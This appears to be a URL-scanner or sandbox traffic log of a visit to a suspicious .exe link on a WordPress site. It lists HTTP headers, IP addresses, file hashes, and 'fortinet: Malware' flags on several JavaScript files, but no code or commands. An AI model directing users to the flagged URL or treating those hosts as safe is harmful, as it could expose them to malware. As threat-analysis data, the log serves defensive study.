GET /wp-content/themes/020list/style/js/jquery-1.11.1.min.js HTTP/1.1 Host: www.hanyueyr.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	104.207.47.103 HTTP/1.1 200 OK Content-Type: application/javascript Server: nginx Date: Tue, 12 Feb 2019 14:25:51 GMT Last-Modified: Tue, 31 May 2016 01:02:08 GMT Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Etag: W/"574ce290-1762a" Expires: Wed, 13 Feb 2019 02:25:51 GMT Cache-Control: max-age=43200 Content-Encoding: gzip --- Additional Info --- Magic: gzip compressed data, from Unix Size: 37386 Md5: 2adc9cff004de22211d32def6198c0f6 Sha1: db38c30a54aa9c6f7ecda86dad98a5436765216f Sha256: a1cd5a94c395c68e04ae01fe699820e1547e08ce41050f7523581ef552324ac1 Alerts: Blacklists: - fortinet: Malware
GET /wp-includes/js/wp-emoji-release.min.js?ver=4.4.4 HTTP/1.1 Host: www.hanyueyr.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	104.207.47.103 HTTP/1.1 200 OK Content-Type: application/javascript Server: nginx Date: Tue, 12 Feb 2019 14:25:52 GMT Last-Modified: Tue, 31 May 2016 01:02:08 GMT Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Etag: W/"574ce290-848c" Expires: Wed, 13 Feb 2019 02:25:52 GMT Cache-Control: max-age=43200 Content-Encoding: gzip --- Additional Info --- Magic: gzip compressed data, from Unix Size: 8440 Md5: 78520ef7f0e8ff48d6f730b959e41f99 Sha1: cc00d8daba54cc7e366f920f20685a55637c3a20 Sha256: 2c5c9dc36d5300c8c1ffa261d244fe7a13b4e4fb8d89290678bce3f3aa24e409 Alerts: Blacklists: - fortinet: Malware
GET /wp-content/themes/020list/style/images/bg-pattern.png HTTP/1.1 Host: www.hanyueyr.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	104.207.47.103 HTTP/1.1 200 OK Content-Type: image/png Server: nginx Date: Tue, 12 Feb 2019 14:25:52 GMT Content-Length: 2360 Last-Modified: Tue, 31 May 2016 01:02:08 GMT Connection: keep-alive Etag: "574ce290-938" Expires: Thu, 14 Mar 2019 14:25:52 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes --- Additional Info --- Magic: PNG image, 102 x 78, 8-bit colormap, non-interlaced Size: 2360 Md5: 911bf43be1f3b70b8a7f757ee3dec6f2 Sha1: ac7d8ee40480989a5ca3814d0e296601a89c2506 Sha256: 0ecaddb1fbc5f091c1d9b535fe34188b7cac56b3a0d7ce7a7a683212e18ff0c2
GET /wp-content/themes/020list/style/images/zoom.jpg HTTP/1.1 Host: www.hanyueyr.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/wp-content/themes/020list/style.css	104.207.47.103 HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 12 Feb 2019 14:25:52 GMT Content-Length: 1285 Last-Modified: Tue, 31 May 2016 01:02:08 GMT Connection: keep-alive Etag: "574ce290-505" Expires: Thu, 14 Mar 2019 14:25:52 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes --- Additional Info --- Magic: JPEG image data, EXIF standard Size: 1285 Md5: bb3e4696d6791d2b372032c33f57e379 Sha1: 0c47602004b02874b16752a41b0b521fc7ff4361 Sha256: 3a0f9db72961d6728933486ec187df820273f67b1eaccdfc70ba3a607d6a043d
POST / HTTP/1.1 Host: ocsp.int-x3.letsencrypt.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Length: 117 Content-Type: application/ocsp-request	80.239.159.17 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 527 Etag: "47046E239F09BBA169581ABCDCAC3A8CAC073B43FA10983B53E735C3AB386F2C" Last-Modified: Mon, 11 Feb 2019 19:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=43065 Expires: Wed, 13 Feb 2019 02:25:49 GMT Date: Tue, 12 Feb 2019 14:28:04 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 527 Md5: d36a4533549eedd9149dd243faddfe96 Sha1: 35bfb10ef7fb2a881a5a2d2ec629c3f6e3568c14 Sha256: 47046e239f09bba169581abcdcac3a8cac073b43fa10983b53e735c3ab386f2c
POST / HTTP/1.1 Host: isrg.trustid.ocsp.identrust.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Length: 115 Content-Type: application/ocsp-request	80.239.159.56 HTTP/1.1 200 OK Content-Type: application/ocsp-response Content-Transfer-Encoding: Binary Last-Modified: Mon, 11 Feb 2019 11:55:23 GMT Etag: "5df5888a0c88d105d142b3cc9cffbdc7efaf1f1a" Content-Length: 1398 Cache-Control: public, no-transform, must-revalidate, max-age=7501 Expires: Tue, 12 Feb 2019 16:33:05 GMT Date: Tue, 12 Feb 2019 14:28:04 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 1398 Md5: 93c04ecbb80346e372c9905fd1cd7787 Sha1: 5df5888a0c88d105d142b3cc9cffbdc7efaf1f1a Sha256: 643871608fa71c3c0ffd9d8b784985a6197d63bf87531fe147a4dd98f2aafc86
GET /18864699.js HTTP/1.1 Host: js.users.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	120.52.140.33 HTTP/1.1 200 OK Content-Type: application/javascript;charset=UTF-8 Date: Tue, 12 Feb 2019 14:28:04 GMT Content-Length: 4898 Connection: keep-alive Server: openresty id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS13q6+9QPjzVgOHpkHhutTJ3gW05w7G Etag: "fa9b6d8f59839e82347f1b1a622c1bb9" version-id: G00111654185C031FFFF900B00764002 Last-Modified: Thu Aug 16 14:56:49 CST 2018 request-id: 00000168A2BAD0529046CD7B42AB3956 x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc Content-Disposition: inline;filename=f.txt Via: - pop1dev2881, - pop1dev2881 x-hcs-proxy-type: 1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block nginx-hit: 1 Age: 1049153 Accept-Ranges: bytes --- Additional Info --- Magic: ASCII text, with very long lines, with no line terminators Size: 4898 Md5: fa9b6d8f59839e82347f1b1a622c1bb9 Sha1: 8ba997764df75fde95619de7474bfd97b4c1a3c8 Sha256: 9796be458376e2819569fcea8fdcfa6bde885fb563b60a29951dd737e71804b9 Alerts: Blacklists: - fortinet: Malware
GET /nlp/index.php?keyword=Nothing%20found%20for%20Fcytkh_426_111%20Exe&from=pc&originUrl=http%3A%2F%2Fwww.hanyueyr.com%2FFCyTKH_426_111.exe&referer=&userAgent=Mozilla%2F5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13)%20Gecko%2F20101203%20Firefox%2F3.6.13&v=8689 HTTP/1.1 Host: api.huizhongkameng.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe Origin: http://www.hanyueyr.com	103.97.32.58 HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: nginx/1.10.2 Date: Tue, 12 Feb 2019 14:28:17 GMT Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.6.37 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization Content-Encoding: gzip --- Additional Info --- Magic: gzip compressed data, from Unix Size: 1541 Md5: 689ce6450776c789135b9003c41faa32 Sha1: 6d5dc9255ed4144878964cba80d17ede70a5fc83 Sha256: 135895fed99f7f9a4a0b5a178708bbbf778a3ab3b009154c61992fc1c6219fd5
GET /go1?id=18864699&rt=1549981684899&rl=1176885&lang=en-US&ct=unknow&pf=1&ins=1&vd=1&ce=1&cd=24&ds=&ing=1&ekc=&sid=1549981684899&tt=Nothing%2520found%2520for%2520%2520Fcytkh_426_111%2520Exe&kw=&cu=http%253A%252F%252Fwww.hanyueyr.com%252FFCyTKH_426_111.exe&pu= HTTP/1.1 Host: ia.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	183.131.207.78 HTTP/1.1 200 Content-Type: application/octet-stream Server: HuaweiCloudWAF Date: Tue, 12 Feb 2019 14:26:39 GMT Content-Length: 0 Connection: keep-alive Set-Cookie: HWWAFSESID=62ca62437b36317e57ab; path=/ HWWAFSESTIME=1549981596376; path=/ --- Additional Info ---
GET /18849991.js HTTP/1.1 Host: js.users.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	120.52.140.33 HTTP/1.1 200 OK Content-Type: application/javascript;charset=UTF-8 Date: Tue, 12 Feb 2019 14:28:05 GMT Content-Length: 5193 Connection: keep-alive Server: openresty id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS1i+CXUiZhWbC5su7wo+iOJrSHLtEWm Etag: "da67164f72d8f7881a4fcde710e32183" version-id: G001116541821FE7FFFF900B0075F1D2 Last-Modified: Thu Aug 16 14:52:51 CST 2018 request-id: 000001689D8B0F979047E646AD64E724 x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc Content-Disposition: inline;filename=f.txt Via: 1.0 pop1dev2880 x-hcs-proxy-type: 1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block nginx-hit: 1 Age: 1150323 Accept-Ranges: bytes --- Additional Info --- Magic: ASCII text, with very long lines, with no line terminators Size: 5193 Md5: da67164f72d8f7881a4fcde710e32183 Sha1: a0586c876019a8b8fb6d88773cc695ba0eb40f2c Sha256: c5919a8bf4affb037211f22d6454ea927c7193be2af8624b5d0b1a650604358c Alerts: Blacklists: - fortinet: Malware
GET /go1?id=18849991&rt=1549981685608&rl=1176885&lang=en-US&ct=unknow&pf=1&ins=1&vd=1&ce=1&cd=24&ds=&ing=2&ekc=&sid=1549981685608&tt=Nothing%2520found%2520for%2520Fcytkh_426_111%2520Exe&kw=&cu=http%253A%252F%252Fwww.hanyueyr.com%252FFCyTKH_426_111.exe&pu= HTTP/1.1 Host: ia.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe Cookie: HWWAFSESID=62ca62437b36317e57ab; HWWAFSESTIME=1549981596376	183.131.207.78 HTTP/1.1 200 Server: HuaweiCloudWAF Date: Tue, 12 Feb 2019 14:26:39 GMT Content-Length: 0 Connection: keep-alive --- Additional Info ---
GET /static/js/shell_v2.js?cdnversion=430551 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	111.206.37.189 HTTP/1.1 200 OK Content-Type: text/javascript Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Encoding: gzip Content-Length: 571 Date: Tue, 12 Feb 2019 14:28:06 GMT Etag: "2176374695" Expires: Tue, 12 Feb 2019 14:58:06 GMT Last-Modified: Fri, 05 Jun 2015 08:50:12 GMT Server: BWS/1.0 Vary: Accept-Encoding --- Additional Info --- Magic: gzip compressed data, from Unix Size: 571 Md5: 00557ef156b68551fac985596b5095e9 Sha1: 56287832fbec3545fbfd175ffe9e39d965341f27 Sha256: 10cf659ebdde336a7bfa71ca25af87f67d153def839e001ac9714873b5b70f39
GET /go1?id=18864699&rt=1549981685660&rl=1176885&lang=en-US&ct=unknow&pf=1&ins=0&vd=2&ce=1&cd=24&ds=&ing=3&ekc=&sid=1549981684899&tt=Nothing%2520found%2520for%2520Fcytkh_426_111%2520Exe&kw=&cu=http%253A%252F%252Fwww.hanyueyr.com%252FFCyTKH_426_111.exe&pu= HTTP/1.1 Host: ia.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe Cookie: HWWAFSESID=62ca62437b36317e57ab; HWWAFSESTIME=1549981596376	183.131.207.78 HTTP/1.1 200 Server: HuaweiCloudWAF Date: Tue, 12 Feb 2019 14:26:40 GMT Content-Length: 0 Connection: keep-alive --- Additional Info ---
GET /go1?id=18849991&rt=1549981685676&rl=1176885&lang=en-US&ct=unknow&pf=1&ins=0&vd=2&ce=1&cd=24&ds=&ing=4&ekc=&sid=1549981685608&tt=Nothing%2520found%2520for%2520Fcytkh_426_111%2520Exe&kw=&cu=http%253A%252F%252Fwww.hanyueyr.com%252FFCyTKH_426_111.exe&pu= HTTP/1.1 Host: ia.51.la User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe Cookie: HWWAFSESID=62ca62437b36317e57ab; HWWAFSESTIME=1549981596376	183.131.207.78 HTTP/1.1 200 Server: HuaweiCloudWAF Date: Tue, 12 Feb 2019 14:28:06 GMT Content-Length: 0 Connection: keep-alive --- Additional Info ---
GET /static/js/bds_s_v2.js?cdnversion=430551 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	111.206.37.189 HTTP/1.1 200 OK Content-Type: text/javascript Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Encoding: gzip Content-Length: 9992 Date: Tue, 12 Feb 2019 14:28:06 GMT Etag: "859391591" Expires: Tue, 12 Feb 2019 14:58:06 GMT Last-Modified: Fri, 05 Jun 2015 08:50:12 GMT Server: BWS/1.0 Vary: Accept-Encoding --- Additional Info --- Magic: gzip compressed data, from Unix Size: 9992 Md5: 666a677963a48538c3c7839cd2e6ff58 Sha1: b6f5b5f721c6a399b69730ea265077304de99e01 Sha256: dfe19948df1360a5a80fa4d63773ef15d1ce728bf918cb4f0d70897817154261
GET /static/css/bdsstyle.css?cdnversion=20131219 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	111.206.37.189 HTTP/1.1 200 OK Content-Type: text/css Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Encoding: gzip Content-Length: 2021 Date: Tue, 12 Feb 2019 14:28:06 GMT Etag: "3350779264" Expires: Tue, 12 Feb 2019 14:58:06 GMT Last-Modified: Fri, 05 Jun 2015 08:50:09 GMT Server: BWS/1.0 Vary: Accept-Encoding --- Additional Info --- Magic: gzip compressed data, from Unix Size: 2021 Md5: 6173f7b3e49c84be234ef0bf8bd51cac Sha1: 1cfb38a64ebc61e184f0eb23f4d33ab7cde46dec Sha256: 034ed2dda6d5a1e42fc58e2cac588815f8dbff7e2f9d56cf6eab6e1a77f490a2
GET /static/js/logger.js?cdnversion=430551 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	111.206.37.189 HTTP/1.1 200 OK Content-Type: text/javascript Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Encoding: gzip Content-Length: 2404 Date: Tue, 12 Feb 2019 14:28:06 GMT Etag: "867751605" Expires: Tue, 12 Feb 2019 14:58:06 GMT Last-Modified: Fri, 05 Jun 2015 08:50:12 GMT Server: BWS/1.0 Vary: Accept-Encoding --- Additional Info --- Magic: gzip compressed data, from Unix Size: 2404 Md5: 8d97ba4654dcd20da83631b6f298e30a Sha1: 4ef15efe157573e2d46ec6eacf7e41160b01a4fa Sha256: 6a43a65e541c0f46d9c542ca83bc4585998c58c0f902b872955852d943279f32
GET /hm.js?d08ccb4fc69a8cc8f34331c26e3fbe5d HTTP/1.1 Host: hm.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	103.235.46.191 HTTP/1.1 200 OK Content-Type: application/javascript Cache-Control: max-age=0, must-revalidate Content-Encoding: gzip Content-Length: 10565 Date: Tue, 12 Feb 2019 14:28:06 GMT Etag: 13c2241d926ff250d2ea89aa654f0b37 P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: apache Set-Cookie: HMACCOUNT=08B1F62B1E1878B1; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT --- Additional Info --- Magic: gzip compressed data, from Unix, max speed Size: 10565 Md5: cc2cc3a07b4811d7688b83928ee9c166 Sha1: 597c8fc636f45f508d4f82563589fb387aaff533 Sha256: f2dc976daf0cd8cc06e5d6f7bd7f4ad55bb68f8eb59f8da14b7a3f80f8d79af9
GET /static/images/is.png?cdnversion=20131219 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://bdimg.share.baidu.com/static/css/bdsstyle.css?cdnversion=20131219	111.206.37.189 HTTP/1.1 200 OK Content-Type: image/png Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Length: 12294 Date: Tue, 12 Feb 2019 14:28:07 GMT Etag: "557408074" Expires: Tue, 19 Feb 2019 14:28:07 GMT Last-Modified: Fri, 05 Jun 2015 08:50:09 GMT Server: BWS/1.0 --- Additional Info --- Magic: PNG image, 20 x 2620, 8-bit colormap, non-interlaced Size: 12294 Md5: fee619fb8de49c08487681bd0119fa5c Sha1: 9c7231237e5e5f4e8408623b401dece33f6563ce Sha256: dc274420601f10bec22ea0dc7e9a1a1425ba67d4a40153d30c864752c09901d2
GET /getnum?url=http%3A%2F%2Fwww.hanyueyr.com%2FFCyTKH_426_111.exe&callback=bdShare.fn._getShare&type=load&t=1549981686589 HTTP/1.1 Host: api.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	111.206.37.189 HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 12 Feb 2019 14:28:07 GMT P3p: CP=" OTI DSP COR IVA OUR IND COM " Server: apache Set-Cookie: BAIDUID=C170EE8E30DA5EF8B18F4D67732B2D6A:FG=1; max-age=31536000; expires=Wed, 12-Feb-20 14:28:07 GMT; domain=.baidu.com; path=/; version=1 Content-Length: 48 --- Additional Info --- Magic: ASCII text Size: 48 Md5: 562da3c8985696cc9ca4a7f971060257 Sha1: a88cbd2c0a605a6eafbadb3df7e1fad5fb42449a Sha256: 8ce67a0d6bbafe907d017afce02287e8ba5840268f54d5c7f1473a5d09467005
GET /static/images/sc.png?cdnversion=20120720 HTTP/1.1 Host: bdimg.share.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://bdimg.share.baidu.com/static/css/bdsstyle.css?cdnversion=20131219	111.206.37.189 HTTP/1.1 200 OK Content-Type: image/png Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Length: 579 Date: Tue, 12 Feb 2019 14:28:07 GMT Etag: "3350780909" Expires: Tue, 19 Feb 2019 14:28:07 GMT Last-Modified: Fri, 05 Jun 2015 08:50:10 GMT Server: BWS/1.0 --- Additional Info --- Magic: PNG image, 96 x 92, 8-bit colormap, non-interlaced Size: 579 Md5: 8fd98fddd3cfac30ba71cdd3a970ff04 Sha1: e5a2ca56973a3d6608e7e3a48ebd9fa5ebda9991 Sha256: e7604f6e940013c082b193cca272bfc9add968dec4ef12f4f7b22f4d7496a314
GET /hm.gif?cc=0&ck=1&cl=24-bit&ds=1176x885&vl=754&et=0&fl=10.0&ja=1&ln=en-us&lo=0&rnd=514050000&si=d08ccb4fc69a8cc8f34331c26e3fbe5d&v=1.2.38&lv=1&ct=!!&tt=Nothing%20found%20for%20Fcytkh_426_111%20Exe&sn=13403 HTTP/1.1 Host: hm.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe Cookie: HMACCOUNT=08B1F62B1E1878B1	103.235.46.191 HTTP/1.1 200 OK Content-Type: image/gif Cache-Control: private, max-age=0, no-cache Content-Length: 43 Date: Tue, 12 Feb 2019 14:28:08 GMT Pragma: no-cache Server: apache X-Content-Type-Options: nosniff --- Additional Info --- Magic: GIF image data, version 89a, 1 x 1 Size: 43 Md5: ad4b0f606e0f8465bc4c4c170b37e1a3 Sha1: 50b30fd5f87c85fe5cba2635cb83316ca71250d7 Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
GET /uploads/c641e2bb9171cd41fb07cbfbdc46563d.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/6adcb17361ab36127768143d2db0896b.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/8d162e736d7e41c2ee1e4607b324707a.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/c92f0e78cf65984c430d21db7ada9ea3.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
